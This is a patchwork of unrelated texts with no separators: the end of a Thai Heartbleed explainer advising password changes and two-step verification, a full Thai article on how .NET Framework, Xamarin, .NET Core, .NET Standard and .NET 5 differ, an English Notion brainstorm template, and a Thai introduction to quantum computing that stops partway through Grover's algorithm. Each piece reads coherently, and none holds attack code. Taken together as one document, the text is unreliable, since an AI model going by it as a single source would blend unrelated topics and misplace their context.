(เพราะรหัสผ่านอย่างเดียวอาจไม่ปลอดภัยจาก Heartbleed) เช่น เปิดใช้งาน Two-step Verification บนเว็บไซต์หรือบริการออนไลน์ต่างๆ ### สรุปใน 5 บรรทัด 1. เราส่งข้อมูลสำคัญที่เป็นความลับ เช่น รหัสผ่าน โดยเข้ารหัสผ่านมาตรฐาน SSL/TLS 2. ซอฟต์แวร์เข้ารหัสตามมาตรฐาน SSL/TLS ที่ได้รับความนิยมสูงที่สุดในโลกคือ OpenSSL 3. OpenSSL มีบั๊ก (ชื่อ Heartbleed) ที่ทำให้กุญแจการเข้ารหัส "อาจ" รั่วได้ 4. ข้อมูลที่เคยส่งผ่าน SSL/TLS ไปยังเว็บไซต์ต่างๆ จึง "อาจ" รั่วได้ 5. ไม่มีใครรู้ว่าคำว่า "อาจ" มันมีโอกาสโดนจริงๆ มากน้อยแค่ไหน ดังนั้นควรป้องกันตัวไว้ก่อน (โดยการเปลี่ยนรหัสผ่าน)
# อธิบายความแตกต่าง .NET Framework, .NET Core, .NET 5, .NET Standard, Xamarin นับตั้งแต่[ไมโครซอฟท์ประกาศเปิดซอร์ส .NET ในปี 2014](https://www.blognone.com/node/62668) โลกของ .NET ก็เปลี่ยนไปจากเดิมมาก เราเห็นชื่อใหม่ๆ โผล่ขึ้นมามากมาย ทั้ง .NET Foundation, .NET Core, .NET Standard, Xamarin, .NET 5 ซึ่งสร้างความสับสนอยู่บ่อยครั้ง บทความนี้จะอธิบายคำศัพท์ที่พบบ่อยในโลก .NET ช่วงหลัง เพื่อให้คนที่ไม่ได้ติดตามวงการ .NET อย่างใกล้ชิด สามารถทำความเข้าใจได้ง่ายขึ้นครับ ### .NET คืออะไรกันแน่ .NET เปิดตัวครั้งแรกในปี 2002 โดยตลอด 17 ปีที่ผ่านมา ไมโครซอฟท์ก็ใช้คำว่า .NET อย่างพร่ำเพรื่อมากในฐานะคำเท่ๆ ด้านการตลาด (เราเคยถึงขั้นมีแบรนด์ Windows .NET และ Visual Studio .NET ด้วยซ้ำ ดีแค่ไหนแล้วที่ยังไม่มี Office .NET) แต่ถ้าตัดเอาคำด้านการตลาดออกไป ความหมายของ .NET คือเฟรมเวิร์คหรือแพลตฟอร์มในการพัฒนาแอพพลิเคชัน ที่แปลงภาษาโปรแกรมในตระกูล .NET (ปัจจุบันเหลือ 3 ภาษาคือ C#, F#, Visual Basic แต่ในอดีตก็มีภาษาอื่นๆ ด้วยที่ไม่ได้รับความนิยมเท่า) มาเป็นภาษากลางที่เรียกว่า **Common Intermediate Language (CIL)** จากนั้นนำไปรันบนระบบปฏิบัติการต่างๆ ผ่านรันไทม์ **Common Language Runtime (CLR)** อีกชั้นหนึ่ง ไมโครซอฟท์นำแนวคิดของ .NET มาจาก Java Platform โดยสามารถเทียบ CIL เป็นเหมือน bytecode และ CLR เป็นเหมือน JVM ในโลกของ Java นั่นเอง แนวคิดของไมโครซอฟท์ในยุคนั้นคือต้องการ "ยกระดับ" เครื่องมือการพัฒนาซอฟต์แวร์ของค่ายตัวเองให้ไปไกลกว่าการพัฒนาซอฟต์แวร์แบบเนทีฟในอดีต แม้ว่าในยุคนั้นเราไม่ได้เห็น .NET บนระบบปฏิบัติการคู่แข่งบนพีซี (Mac/Linux) แต่ไมโครซอฟท์ก็ประสบความสำเร็จ (ในระดับหนึ่ง) ในการผลักดัน .NET ให้ไปไกลกว่าแอพบนเดสก์ท็อป เช่น [ASP.NET](http://asp.net/) (เว็บ) หรือ .NET Compact Framefork (อุปกรณ์พกพา) ### .NET Framework ทุกอย่างเริ่มต้นที่นี่ แนวคิด .NET ถูกผลักดันมาเป็นซอฟต์แวร์จริงๆ ที่จับต้องได้ในชื่อว่า **.NET Framework** ซึ่งเป็น implementation เวอร์ชันต้นฉบับของไมโครซอฟท์เอง ที่ออกเวอร์ชัน 1.0 ในปี 2002 ไมโครซอฟท์พัฒนาฟีเจอร์ให้ .NET Framework อย่างต่อเนื่องในทศวรรษ 2000s โดยพื้นฐานของ .NET Framework ถือว่าสมบูรณ์ในเวอร์ชัน 2.0 (2005) ตามด้วยการเพิ่มฟีเจอร์ใหม่ๆ อย่าง WPF, WCF, WF ใน .NET 3.0 (2006) จากนั้นเป็นฟีเจอร์ระดับสูงอย่าง Entity Framework, LINQ ในเวอร์ชัน 3.5 (2007) และ 4.0 (2010) หลังจากไมโครซอฟท์ออก .NET Framework 4.5 ในปี 2012 การพัฒนาก็เริ่มช้าลง เพราะไมโครซอฟท์ปรับยุทธศาสตร์ไปเน้นที่ .NET Core แทน แต่ตัว .NET Framework ก็ยังได้อัพเดตย่อยอยู่เรื่อยๆ โดยเวอร์ชันล่าสุดคือ [.NET Framework 4.8](https://www.blognone.com/node/109276) ที่เพิ่งออกเมื่อเดือนเมษายน 2019 ถึงแม้ว่า .NET Framework เป็นซอฟต์แวร์ที่ได้รับความนิยมอย่างสูง แต่ข้อจำกัดของมันคือทำงานได้เฉพาะบน Windows เท่านั้น (เวอร์ชันใดบ้างขึ้นกับยุคสมัย ถ้า ณ ปัจจุบันคือต้องเป็น Windows 7 ขึ้นไป) และตัวมันเองเป็นซอฟต์แวร์แบบปิดซอร์ส (แม้ว่าช่วงหลังจะทยอยเปิดซอร์สบางส่วนออกมาก็ตาม) ### Mono/Xamarin ทางเลือกของระบบปฏิบัติการทางเลือก ข้อจำกัดของ .NET Framework ที่ทำงานได้เฉพาะบน Windows ส่งผลให้เกิดความต้องการใช้งาน .NET บนระบบปฏิบัติการทางเลือกอื่นๆ (ในยุคนั้นคือ Mac/Linux) จึงมีบริษัทซอฟต์แวร์ชื่อ Ximian สร้างซอฟต์แวร์ที่เข้ากันได้กับมาตรฐาน .NET (CIL/CLR) ขึ้นมาอีกตัว (นับเป็นอีก implementation) ในชื่อว่า Mono และออกเวอร์ชัน 1.0 ในปี 2004 เป้าหมายของ Mono ในยุคแรกคือเปิดให้เขียนโปรแกรมด้วย C# บนระบบปฏิบัติการลินุกซ์ได้ ตัวโครงการ Mono เป็นโอเพนซอร์สที่สนับสนุนโดย Ximian ซึ่งมีกำลังเงินไม่เยอะนัก ในช่วงแรกของ Mono จึงวิ่งไล่ตามฟีเจอร์ของ .NET Framework เวอร์ชันไมโครซอฟท์อย่างช้าๆ การเปลี่ยนแปลงของ Mono เกิดขึ้นหลัง[ทีมงาน Ximian โดนเจ้าของใหม่ Attachmate เลย์ออฟในปี 2011](https://www.blognone.com/news/23461/attachmate-%E0%B9%80%E0%B8%A3%E0%B8%B4%E0%B9%88%E0%B8%A1%E0%B8%9B%E0%B8%A5%E0%B8%94%E0%B8%9E%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B8%87%E0%B8%B2%E0%B8%99-novell-%E0%B8%97%E0%B8%B5%E0%B8%A1-mono-%E0%B9%82%E0%B8%94%E0%B8%99%E0%B8%94%E0%B9%89%E0%B8%A7%E0%B8%A2) ทำให้[ทีมงานหลักมาเปิดบริษัทใหม่ชื่อ Xamarin](https://www.blognone.com/news/23766/%E0%B8%97%E0%B8%B5%E0%B8%A1-mono-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%95%E0%B8%B1%E0%B9%89%E0%B8%87%E0%B8%9A%E0%B8%A3%E0%B8%B4%E0%B8%A9%E0%B8%B1%E0%B8%97%E0%B9%83%E0%B8%AB%E0%B8%A1%E0%B9%88-xamarin-%E0%B9%80%E0%B8%99%E0%B9%89%E0%B8%99%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2-net-%E0%B8%9A%E0%B8%99%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%96%E0%B8%B7%E0%B8%AD) และ[รับช่วงโครงการ Mono มาทำต่อ](https://www.blognone.com/news/25025/attachmate-%E0%B8%A2%E0%B8%81%E0%B8%8B%E0%B8%AD%E0%B8%9F%E0%B8%95%E0%B9%8C%E0%B9%81%E0%B8%A7%E0%B8%A3%E0%B9%8C%E0%B8%95%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B9%E0%B8%A5-mono-%E0%B9%83%E0%B8%AB%E0%B9%89%E0%B8%9A%E0%B8%A3%E0%B8%B4%E0%B8%A9%E0%B8%B1%E0%B8%97-xamarin-%E0%B9%84%E0%B8%9B%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%95%E0%B9%88%E0%B8%AD) บริบทของยุคสมัย Xamarin เปลี่ยนไป เพราะโลกเริ่มเข้าสู่ยุคสมาร์ทโฟนเต็มตัว ทำให้ Xamarin หันมาโฟกัสที่การนำเครื่องมือฝั่ง C# จากโครงการ Mono มาใช้สร้างแอพพลิเคชันบน Android/iOS เป็นหลัก โดยชูจุดเด่นว่าเขียน C# เพียงครั้งเดียว ได้แอพ 2 ตัวบน 2 แพลตฟอร์มเลย (ช่วยให้นักพัฒนาสาย C# เข้าสู่โลกมือถือได้ง่ายขึ้นมาก) เครื่องมือตัวนี้เรียกว่า Xamarin Studio เป็นการนำซอฟต์แวร์โอเพนซอร์ส Mono มารวมกับซอฟต์แวร์ปิดของ Xamarin เอง (แปลว่า Xamarin ตัวที่ขายทำเงินนั้นปิดซอร์ส) แนวทางนี้ทำให้ Xamarin เติบโตและอยู่รอดได้ในเชิงธุรกิจ การเปลี่ยนแปลงเกิดขึ้นอีกครั้งในปี 2016 เมื่อ[ไมโครซอฟท์ประกาศซื้อ Xamarin](https://www.blognone.com/node/78318), [เปลี่ยนมาแจก Xamarin ฟรี](https://www.blognone.com/node/79571), [เปิดซอร์สโค้ดบางส่วนของ Xamarin](https://www.blognone.com/node/79571) (รวมถึงย้ายบริการสำหรับนักพัฒนาตัวอื่นๆ ของ Xamarin ที่ไม่ใช่ .NET โดยตรงเข้ามาอยู่ในเครือ Visual Studio ด้วย) ทำให้สถานะของ Xamarin เปลี่ยนไป จากสินค้าที่ใช้ทำเงินเลี้ยงบริษัท กลายมาเป็นอีก implementation ของแพลตฟอร์ม .NET ที่เน้นการพัฒนาแอพพลิเคชันบนสมาร์ทโฟน Android/iOS ### .NET Core คิดใหม่ทำใหม่ เพื่อทุกแพลตฟอร์ม ไมโครซอฟท์หันหัวเรือของ .NET ครั้งใหญ่ในปี 2014 โดยประกาศเปิดซอร์สโค้ดของ .NET Framework และยกให้องค์กรกลางคือ .NET Foundation เป็นผู้ดูแล ตัวอย่างบริษัทอื่นที่เข้าเป็นสมาชิกของ .NET Foundation ได้แก่ Red Hat, JetBrain, Unity, Samsung รวมถึงคู่แข่งรายสำคัญอย่าง Google ด้วย หลังเปิดซอร์สโค้ดบางส่วนของ .NET Framework ไมโครซอฟท์และ .NET Foundation ก็เดินหน้าพัฒนามันต่อในชื่อใหม่ว่า **.NET Core** เหตุที่ไมโครซอฟท์ต้องใช้คำว่า Core เป็นเพราะว่ามันมีฟีเจอร์เพียงแค่บางส่วนของ .NET Framework เวอร์ชันต้นฉบับเท่านั้น [จากข้อมูลของไมโครซอฟท์เอง](https://www.blognone.com/node/112567) ระบุว่า .NET Core เวอร์ชัน 1.0 มี API เพียงแค่ประมาณ 18,000 ตัว เทียบกับ API ทั้งหมดของ .NET Framework 4.8 ที่มีมากถึง 2 แสนกว่าตัว จุดเด่นของ .NET Core คือการทำงานข้ามแพลตฟอร์มทั้ง Windows, Mac, Linux แต่ช่วงแรกของ .NET Core ก็ยังจำกัดรูปแบบงานเฉพาะแอพพลิเคชันแบบคอมมานด์ไลน์, แอพแบบ UWP และเว็บแอพ ([ASP.NET](http://asp.net/)) เป็นหลัก (พูดง่ายๆ มันคือการเปิดให้เราเอา [ASP.NET](http://asp.net/) ไปรันบนลินุกซ์ได้) แต่ภายหลัง ไมโครซอฟท์ก็ไล่เพิ่มฟีเจอร์และ API ให้กับ .NET Core มาเรื่อยๆ เช่น รองรับภาษา VB, F# เพิ่มเติม จนถึงเวอร์ชันล่าสุดคือ [.NET Core 3.0](https://www.blognone.com/node/112111) ที่รองรับการรันแอพเดสก์ท็อปแบบดั้งเดิม (WinForms, WPF) แม้ว่าใช้งานได้เฉพาะบนวินโดวส์ แต่ก็ช่วยให้แอพเดสก์ท็อปเก่าๆ ที่เขียนด้วย .NET Framework สามารถทำงานบน .NET Core ได้ เราอาจพอพูดได้ว่า .NET Core เป็นการเขียน .NET Framework ขึ้นมาใหม่ให้เข้ากับยุคโอเพนซอร์ส-ข้ามแพลตฟอร์ม (โดยใช้แกนตัวเดียวกัน แต่ถือว่าเป็นคนละ implementation) ที่ผ่านมา .NET Core ยังวิ่งไล่ตามฟีเจอร์ของ .NET Framework ให้ทัน แต่ล่าสุดไมโครซอฟท์เพิ่งบอกว่า[หยุดพอร์ต API จาก .NET Framework แล้ว](https://www.blognone.com/node/112567) ด้วยเหตุผลว่า API หลายตัวของ .NET Framework เป็นของเก่าที่อาจมีคนใช้งานไม่เยอะนัก (เช่น WCF ที่ไมโครซอฟท์เลือกไม่พอร์ตมายัง .NET Core) และเปิดให้เป็นหน้าที่ของชุมชนโอเพนซอร์สที่ (อาจ) สนใจเข้ามาทำหน้าที่นี้แทน ### .NET Standard มาตรฐานกลางสำหรับทุกคน มาถึงตรงนี้ เรารู้จัก implementation ของ .NET กันมาแล้ว 3 ตัว ได้แก่ .NET Framework ต้นฉบับ, .NET Core ตัวใหม่ และ Xamarin ที่ถูกซื้อกิจการมา .NET ทั้งสามตัวพัฒนาขึ้นบนเทคโนโลยี CIL/CLR เหมือนกัน แต่แตกต่างกันในรายละเอียด และแต่ละตัวก็มีโฟกัสกลุ่มลูกค้าที่แตกต่างกัน เช่น - **.NET Framework** สำหรับแอพเดสก์ท็อปยุคเก่า (WinForms/WPF) หรือเว็บแอพ ([ASP.NET](http://asp.net/)) - **.NET Core** สำหรับแอพเดสก์ท็อปยุคใหม่ (UWP) หรือเว็บแอพ ([ASP.NET](http://asp.net/)) บนระบบปฏิบัติการอื่น - **Xamarin** แอพบนสมาร์ทโฟน (Android/iOS) แต่ส่วนที่ซ้อนทับกันก็มี ตรงนี้ทำให้นักพัฒนาสับสนว่า .NET แต่ละ implementation ทำงานร่วมกันได้แค่ไหน เราสามารถนำโค้ดของเราที่เขียนบน .NET Framework ไปรันบน .NET Core ได้หรือไม่ ฯลฯ ไมโครซอฟท์จึงแก้ปัญหานี้ด้วยการกำหนด **.NET Standard** ที่ตัวมันเองไม่ใช่ซอฟต์แวร์ แต่เป็นมาตรฐานกลางในโลกของ .NET เองให้รู้ว่า .NET แต่ละชุด แต่ละเวอร์ชัน รองรับฟีเจอร์ใดบ้าง ผู้ที่สนใจข้อมูลนี้ สามารถดูได้จาก[หน้าเว็บ .NET Standard](https://dotnet.microsoft.com/platform/dotnet-standard) ซึ่งเลือกเวอร์ชันของ .NET Standard ที่ต้องการได้ (เวอร์ชันล่าสุดคือ .NET Standard 2.1) เพื่อดูตารางว่า .NET ตัวใดซัพพอร์ตบ้าง ### .NET 5 จักรวาลรวมเป็นหนึ่ง จักรวาลของ .NET ในปัจจุบันมีทั้งหมด 3 implementation แยกตามกลุ่มลูกค้า แต่ทั้ง 3 กลุ่ม 3 ทีมล้วนแต่เป็นคนของไมโครซอฟท์ทั้งหมดแล้ว (หลังการซื้อ Xamarin) แผนการของไมโครซอฟท์จึงเป็นการหลอมรวม .NET ทั้งสาม (ซึ่งมีที่มาแตกต่างกัน) ให้เป็นหนึ่งเดียว กรณีของ .NET Framework กับ .NET Core นั้นชัดเจนว่า .NET Core คืออนาคต และ .NET Framework จะหยุดพัฒนาแล้วค่อยๆ เลิกใช้ไปในระยะยาว (แอพ "ส่วนใหญ่" ที่รันบน .NET Framework จะสามารถทำงานบน .NET Core ได้) เมื่อ .NET Core พัฒนามาจนสมบูรณ์พอแล้ว มันจะใช้แทน .NET Framework ได้ ช่วงกลางปีนี้[ไมโครซอฟท์จึงเปิดตัว .NET 5](https://www.blognone.com/node/109621) ที่ไม่มีคำว่า Core หรือ Framework ต่อท้ายให้สับสนกันอีกต่อไป (กลายเป็นตัวเดียวกันแทน) ส่วนเลขเวอร์ชัน 5 เป็นการนับต่อจาก .NET Framework 4.x และกรณีของ .NET Core ก็คือข้ามเวอร์ชัน 4.0 ไปเลย .NET 5 ยังเป็นการหลอมรวมสายของ .NET Core กับ Xamarin เข้าด้วยกัน (โดยยังใช้ระบบรันไทม์คู่ เลือกได้ว่าจะใช้รันไทม์ CoreCLR ของ .NET Core หรือรันไทม์ Mono ของ Xamarin) การรวมจักรวาล .NET เป็นหนึ่งเดียว ทำให้การเขียนแอพบน .NET 5 ถือว่าเป็นตัวเดียวครบจบทุกงาน เขียนได้ทั้งแอพเดสก์ท็อป (WinForms, WPF, UWP), เว็บแอพ ([ASP.NET](http://asp.net/)), สมาร์ทโฟน (Xamarin) รวมถึงงานด้านอื่นๆ อย่างการเขียนเกม (Unity) และอุปกรณ์ IoT ด้วย .NET 5 มีกำหนดออกช่วงปลายปี 2020 และหลังจากนั้น ไมโครซอฟท์จะออก .NET เวอร์ชันใหม่ปีละครั้งช่วงปลายปี (.NET 6 ในช่วงปลายปี 2021 และนับเลขเวอร์ชันต่อไปเรื่อยๆ)
# New Brainstorm Tags: Product <aside> 💡 **Notion Tip:** Use this template to source ideas from your team even when you're not in the same room. Articulate a question you'd like to have answered. At the same time, people can add their bulleted ideas below that question and tag themselves. Click New topic to generate a new question to answer. </aside> # [Question to answer] - First idea - Second idea - Third idea - Fourth idea # Whiteboard <aside> 💡 **Notion Tip:** Notion makes it easy to pull in brainstorming resources from other apps so you all stay focused on the same doc. For instance, you can embed mind-mapping boards from Miro and files from Figma that will update in real time. </aside> ↓ Embed examples below [https://www.notion.so](https://www.notion.so) [https://www.notion.so](https://www.notion.so) [https://www.notion.so](https://www.notion.so)
# คอมพิวเตอร์ควอนตัมเบื้องต้น: เรามาถึงจุดที่คอมพิวเตอร์ต้องพึ่งฟิสิกส์ควอนตัมกันแล้ว ช่วงหลังมานี้เราเริ่มจะได้ยินข่าวเกี่ยวกับคอมพิวเตอร์ควอนตัมกันมากขึ้น ทั้งเรื่องของการวิจัยพัฒนา จนไปถึงความพยายามสร้างเพื่อเอาไปใช้จริง หลายหน่วยงานในต่างประเทศก็เริ่มพูดถึง และให้การสนับสนุนงานวิจัยเหล่านี้กันมากขึ้นเรื่อยๆ (ขนาดนายกรัฐมนตรีแคนาดา[ยังเคยพูดถึงเลย](https://www.blognone.com/node/80035)) หลายคนเชื่อกันว่านี่จะเป็นวิวัฒนาการของคอมพิวเตอร์แบบก้าวกระโดด แต่ก็ยังมีอีกหลายคนที่ไม่รู้จัก หรือเพิ่งจะได้ยินชื่อนี้เป็นครั้งแรกเสียด้วยซ้ำ บทความนี้เขียนไว้เพื่อนำเสนอว่าคอมพิวเตอร์ควอนตัมคืออะไร แตกต่างจากคอมพิวเตอร์ที่เราใช้ๆ กันยังไง และเราจะได้ประโยชน์อะไรจากมัน ## ยินดีต้อนรับสู่โลกฟิสิกส์ควอนตัม [กฎของมัวร์](https://www.blognone.com/node/67764)กล่าวไว้ว่าทรานซิสเตอร์ในวงจรไอซีจะมีจำนวนเพิ่มขึ้นเป็นเท่าตัวทุกๆ 2 ปี ในวงจรขนาดเท่าเดิม หากกฎข้อนี้ยังคงเป็นจริงไปเรื่อยๆ สักวันหนึ่งทรานซิสเตอร์ก็จะมีขนาดเล็กลงจนแทบจะเท่ากับอะตอม เมื่อถึงเวลานั้น ฟิสิกส์ในชีวิตประจำวันจะไม่สามารถอธิบายปรากฎการณ์ต่างๆ ที่เกิดขึ้นภายในวงจรได้อีกต่อไป ฟิสิกส์ควอนตัมจะเข้ามามีบทบาทแทน แต่แทนที่จะเพิ่มแค่จำนวนทรานซิสเตอร์ขนาดเล็กเข้าไปเรื่อยๆ ก็มีนักวิทยาศาสตร์ปิ๊งไอเดีย ว่าทำไมไม่ลองเอาสมบัติบางประการในฟิสิกส์ควอนตัมมาใช้ในการคำนวณซะเลยล่ะ ไอเดียที่ว่านี้กลายร่างมาเป็นศาสตร์ใหม่ เรียกว่า “การประมวลผลควอนตัม” (quantum computing) ศาสตร์นี้เริ่มมีมาในช่วงต้นปี 1980 แล้ว แต่ยังไม่ได้รับความสนใจมากนัก จนกระทั่งปี 1994 ถึงจะเริ่มมาบูม เนื่องจากมีคนพัฒนาอัลกอริทึมหาตัวประกอบเฉพาะของจำนวนเต็มขนาดใหญ่ด้วยคอมพิวเตอร์ควอนตัมได้สำเร็จ อัลกอริทึมนี้ประมวลผลได้เร็วมากเสียจนสะเทือนวงการวิทยาการเข้ารหัสกันเลยทีเดียว สรุปแล้ว คอมพิวเตอร์ควอนตัมก็คือคอมพิวเตอร์ที่เอาสมบัติของฟิสิกส์ควอนตัมมาใช้ในการประมวลผลนั่นเอง แล้วสมบัติของฟิสิกส์ควอนตัมอะไรบ้างหล่ะที่ถูกนำมาใช้ เพื่อตอบคำถามนี้ ผมจะพาไปแนะนำให้รู้จักกับ “คิวบิต” หน่วยข้อมูลที่เล็กที่สุดในคอมพิวเตอร์ควอนตัม ## ศูนย์ หนึ่ง และทั้งสองอย่างในเวลาเดียวกัน เป็นที่รู้กันว่าคอมพิวเตอร์คลาสสิกจะมีหน่วยแทนข้อมูลที่เล็กที่สุดคือบิต (bit) ในข้อมูล 1 บิต จะมีอยู่ด้วยกัน 2 สถานะ ได้แก่ 0 และ 1 (*หลังจากนี้จะใชัคำว่า “คอมพิวเตอร์คลาสสิก” เรียกคอมพิวเตอร์ที่เราใช้งานกันอยู่ในปัจจุบัน*) ในคอมพิวเตอร์ควอนตัม ข้อมูลบิตจะมีสถานะพิเศษอีกอย่างหนึ่ง เรียกว่า superposition เป็นสถานะที่บิตเป็นทั้ง 0 และ 1 ในเวลาเดียวกัน เลียนแบบสถานะ quantum superposition ของอนุภาคขนาดเล็ก โดยบิตในคอมพิวเตอร์ควอนตัมนี้มีชื่อเรียกกันเล่นๆ ว่า “คิวบิต” (qubit มาจากคำว่า quantum bit) วัสดุทางกายภาพที่จะใช้แทนข้อมูลคิวบิต ก็เลยเป็นอนุภาคขนาดเล็ก และสมบัติบางประการของมันมีสถานะ quantum superposition ตัวอย่างเช่น ขั้ว (polarization) ของอนุภาคโฟตอนของแสง หรือสปิน (spin) ของอนุภาค อย่าเพิ่งเข้าใจผิดนะครับว่า superposition คือสถานะหมายเลข 2 ต่อจาก 0 และ 1 จริงๆ แล้วคิวบิตในสถานะ superposition นั้นยังไม่เป็นข้อมูลที่จะเอามาใช้จริงได้ แต่ต้องถูกนำไปวัดก่อน เรียกกระบวนการนี้ว่า “measurement” เมื่อคิวบิตถูกวัดแล้ว มันต้องตัดสินใจทันทีว่าจะเป็น 0 หรือ 1 โดยดูจากความน่าจะเป็นของการเปลี่ยนสถานะที่คิวบิตถูกตั้งเอาไว้ เราสามารถแก้ไขความน่าจะเป็นของการวัดคิวบิตเพื่อใช้คำนวณได้ เช่น อาจจะแก้สถานะ superposition ให้มีโอกาสถูกวัดได้สถานะ 1 สัก 70% หรือในกรณีของคิวบิต 2 ตัว เมื่อเข้าสถานะ superposition มันจะมีสถานะ 00, 01, 10, และ 11 พร้อมๆ กัน และเราก็สามารถปรับแก้ความน่าจะเป็นของการวัดให้สถานะ 00 มีโอกาสถูกวัดเจอได้สูงกว่าสถานะอื่นๆ รายละเอียดของคิวบิตข้างต้นนี้อาจจะยังไม่ถูกต้องร้อยเปอร์เซ็นต์ สถานะของคิวบิตแท้จริงแล้วไม่จำเป็นต้องเป็น 0 หรือ 1 เสมอไป ขึ้นอยู่กับตัว measurement แต่ในขั้นต้นให้เข้าใจกันแบบนี้ก็พอครับ ## ทำทุกอย่างพร้อมกันในคราวเดียว นักวิทยาศาสตร์คาดการณ์ไว้ว่าคุณสมบัติ superposition ของคิวบิตจะเป็นคุณสมบัติหนึ่งที่สามารถนำไปสร้างอัลกอริทึมสำหรับคอมพิวเตอร์ควอนตัม และจะช่วยให้ประมวลผลได้รวดเร็วขึ้นกว่าเดิม ลองดูสถานการณ์สมมติต่อไปนี้ประกอบ (*หลังจากนี้จะใช้คำว่า “อัลกอริทึมควอนตัม” เรียกอัลกอริทึมสำหรับคอมพิวเตอร์ควอนตัม*) สมมติว่าเราจะไขล็อก (เปรียบเสมือนฟังก์ชัน) โดยมีกุญแจ (เปรียบเสมือนข้อมูล input) มาให้ 8 ดอก และให้การปลดล็อกสำเร็จหรือไม่สำเร็จเป็น output ของฟังก์ชัน ในบรรดากุญแจทั้ง 8 ดอกนี้จะมีเพียงดอกเดียวเท่านั้นที่สามารถปลดล็อกได้สำเร็จ และการปลดล็อกสำเร็จคือ output ที่เราต้องการ ถ้าเป็นคอมพิวเตอร์คลาสสิก เราจะต้องหยิบกุญแจขึ้นมาไขทีละดอกจนกว่าจะเจอดอกที่สามารถปลดล็อกได้ หรือไม่งั้น เราอาจจะพิมพ์ล็อกขึ้นมาหลายๆ ชุด แล้วให้กุญแจแต่ละดอกไขของใครของมันพร้อมๆ กันได้ โดยแลกกับการใช้ทรัพยากรที่เพิ่มขึ้น แต่สำหรับคอมพิวเตอร์ควอนตัมนั้น ตัวกุญแจสามารถสร้างสถานะ superposition เสมือนกับว่ามีอยู่ 8 ดอกพร้อมๆ กัน แล้วปลดล็อกพร้อมกันทีเดียวได้เลย กระบวนการในลักษณะนี้ถูกเรียกว่าการประมวลผลควอนตัมแบบขนาน (quantum parallelism) กระบวนการ quantum parallelism เป็นจุดเริ่มต้นของกระบวนการในอัลกอริทึมควอนตัมหลายๆ ตัว แต่นั่นยังไม่ใช่หัวใจสำคัญของอัลกอริทึมควอนตัม เพราะถ้าเป้าหมายจริงๆ คือการหากุญแจดอกที่ปลดล็อกได้ กระบวนการนี้ก็ไม่ช่วยอะไร ## อัลกอริทึมที่เร็วขึ้นจนต้องชายตามอง Scott Aaronson ผู้ช่วยศาสตราจารย์ด้านวิทยาการคอมพิวเตอร์แห่ง MIT ผู้เขียนหนังสือ “Quantum Computing since Democritus” [ให้สัมภาษณ์กับ The Washington Post](https://www.washingtonpost.com/news/the-switch/wp/2014/01/02/confused-about-the-nsas-quantum-computing-project-this-mit-computer-scientist-can-explain/) ว่าแท้จริงแล้วหัวใจสำคัญของอัลกอริทึมควอนตัมคือการดัดแปลงสถานะ superposition ของคิวบิตเพื่อให้ได้คำตอบที่ต้องการ โดยอาจจะเพิ่มโอกาสของการวัดได้คำตอบที่ต้องการให้สูงขึ้น และลดโอกาสของการวัดได้คำตอบที่ผิดให้น้อยลง เพื่อให้เห็นภาพมากขึ้น ผมจะขอพูดถึงอัลกอริทึมควอนตัม 2 ตัวด้วยกัน ได้แก่ Grover’s search algorithm และ Shor’s algorithm **Grover’s search algorithm: อัลกอริทึมค้นหาข้อมูลที่เร็วทะลุขีดจำกัด** อัลกอริทึมบนคอมพิวเตอร์คลาสสิกสำหรับค้นหาข้อมูลแบบ unstructured (ไม่มีระเบียบ ไม่มีการจัดเรียงหรือทำอะไรมาก่อน) ที่เร็วที่สุดแล้วคือ linear search คือไล่หาไปเรื่อยๆ จนกว่าจะเจอนั่นเอง ดังนั้น ถ้าข้อมูลดังกล่าวมีจำนวน 1,000,000 ชุด เหตุการณ์เลวร้ายที่สุดคือเราจะหาข้อมูลที่ต้องการเจอในรอบที่หนึ่งล้าน แต่อัลกอริทึมควอนตัมของ Lov Grover นั้นสามารถค้นหาข้อมูลแบบ unstructured ได้ เลวร้ายสุดๆ ก็ใช้เวลาเพียงประมาณ 1,000 รอบเท่านั้น แล้วมันทำได้อย่างไร ขอให้สังเกตกราฟด้านล่างนี้ประกอบ สมมติว่ามีข้อมูลอยู่ 4 ชุด ได้แก่ ข้อมูลที่ตำแหน่ง 00, 01, 10, 11 ตามลำดับ โดยข้อมูลที่เราต้องการอยู่ที่ตำแหน่ง 10 ซึ่งกราฟแท่งจะถูกไฮไลต์ด้วยสีแดง เราจะต้องเตรียมคิวบิตไว้ทั้งหมด 4 สถานะ คือสถานะ 00, 01, 10, และ 11 ตามตำแหน่งของข้อมูล อัลกอริทึมของ Grover จะมีกระบวนการดังนี้ 1. เตรียมสถานะ superposition ของคิวบิต ให้ความน่าจะเป็นของการวัดคิวบิตแล้วได้สถานะต่างๆ นั้นมีค่าเท่ากัน *กราฟซ้ายบน* จะเห็นได้ว่าคิวบิตมีความน่าจะเป็น (amplitude) ของการวัดแล้วได้สถานะต่างๆ เท่ากัน 2. ทำการกลับเครื่องหมายความน่าจะเป็นของการวัดคิวบิตแล้วได้ตำแหน่งของข้อมูลที่ต้องการค้นหา จากบวกให้กลายเป็นลบ *กราฟขวาบน* จะเห็นได้ว่ากราฟแท่งสีแดงจะโตกลับข้างจากกราฟแท่งสีม่วง 3. หาค่าเฉลี่ยของความน่าจะเป็นของการวัดคิวบิตแล้วได้สถานะต่างๆ ทุกสถานะ (สมมติให้เท่ากับ A) *กราฟซ้ายล่าง* เส้นประแสดงปริมาณค่าเฉลี่ยเทียบกับ amplitude ของแต่ละสถานะ 4. คำนวณความน่าจะเป็นของสถานะข้อมูลทุกๆ สถานะเสียใหม่ ให้แต่ละสถานะมีค่าเท่ากับ 2A - a<sub>i</sub> (เมื่อ a<sub>i</sub> แทนค่าความน่าจะเป็นของการวัดคิวบิตแล้วได้สถานะ i) เนื่องจากความน่าจะเป็นของสถานะ 10 มีค่าเป็นลบ ดังนั้น สูตรการคำนวณดังกล่าวจะไปเพิ่มค่าความน่าจะเป็นให้สถานะ 10 มีโอกาสถูกวัดเจอได้มากขึ้น \[2A - (-a<sub>10</sub>) = 2A + a<sub>10</sub>\] 